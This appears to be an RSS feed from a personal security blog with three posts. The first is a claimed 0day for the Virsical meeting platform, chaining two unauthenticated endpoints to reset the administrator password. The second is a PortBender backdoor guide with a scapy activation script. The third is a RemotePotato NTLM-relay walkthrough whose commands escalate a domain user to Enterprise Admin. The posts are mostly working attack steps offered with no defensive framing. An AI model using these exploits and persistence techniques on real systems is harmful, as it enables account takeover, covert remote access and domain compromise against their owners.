<![CDATA[R&T]]> 2021-10-12T22:40:02+08:00 https://Conanjun.github.io/ MWeb <![CDATA[virsical meeting platform 0day exploit]]> 2021-10-12T22:30:31+08:00 https://Conanjun.github.io/16340490317488.html bug description

two unauthorized interface combined exploit , leads to administrator account takeover

exploit detail

  1. use unauthorized interface 1: /smartmeeting/smart/third/deleteRoom?roomId=618 to get administrator name

  1. use unauthorized interface 2: /iwork/userInfo/updatePwd?userId=sysadmin&pwd=xxxxxx to update administrator's password(new pwd is base64 encoded)

  1. successfully login to meeting manage panel with new password

]]> <![CDATA[使用 PortBender 实现 Duqu 2.0 持久化后门(NDIS 过滤器驱动程序 (PortServ.sys)]]> 2021-08-31T13:42:50+08:00 https://Conanjun.github.io/16303885700620.html 步骤
  1. 部署后门:将443端口的流量转发到3389端口
PortBender backdoor 443 3389 praetorian.antihacker

  1. activate.py 运行激活后门,其中src为运行连接的攻击者ip,dst为外网443端口机器的ip (再运行一次关闭后门)
import argparse
from scapy.all import *
TCP_ACTIVATE=TCP(dport=443, flags="SR", seq=100)
data = "praetorian.antihacker"
a = IP(dst="172.16.246.131", src="172.16.246.132")/TCP_ACTIVATE/data
send(a)

复用80端口(iis服务)(当激活后门后iis服务失效,休眠后门后重新恢复)

参考

PortBender
How to redirect traffic from an incoming TCP port using the Portbender utility

]]> <![CDATA[RemotePotato]]> 2021-08-24T21:07:31+08:00 https://Conanjun.github.io/16298104512534.html 利用场景 
获取低权限用户权限shell+具有Domain Administrator特权的用户实际上已登录到同一主机或通过远程桌面登录(不需要有impersonation权限)

同一主机在线有点鸡肋,打学校机房可能是神器,老师远程查电脑就得中招

利用原理

dcom triggerIObjectExporter::ResolveOxid2 authenticated with ntlm sign set+IRemUnknown2::RemRelease authenticae with ntlm sign not set)+mitm+ntlm跨协议中继(mitm需要域管在线同一个机器)

利用过程

RemotePotato0

测试环境: 攻击机(win10_10.1.1.133+mac_10.1.1.1)-> victim(win2012_10.1.1.132)

  1. adsecurity\administrator登录win2012的普通机器

  2. 在win10上powershell winrm登录win2012,以普通域用户(zhangsan)的权限

    Set-Item WSMan:\localhost\Client\TrustedHosts -Value *
Enter-PSSession -ComputerName 10.1.1.132 -Authentication Negotiate -Credential $(get-credential)

  3. mac上开启ntlm中继

python ntlmrelayx.py -t ldap://10.1.1.128 --no-wcf-server --escalate-user zhangsan

  1. winrm执行RemotePotato0
.\RemotePotato0.exe -m 0 -r 10.1.1.1 -x 10.1.1.132 -p 9999 -s 1 -c "{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}" # win2012的cid在exp里没有,需要额外补充

  1. ntlm中继成功,zhangsan变为企业管理员权限

    psexec从无权限变为有权限

参考

relaying-potatoes-dce-rpc-ntlm-relay-eop
Remote Potato – From Domain User to Enterprise Admin
OXID Resolution Request
IRemUnknown Methods
Remote Potato–从域用户到企业管理员

]]>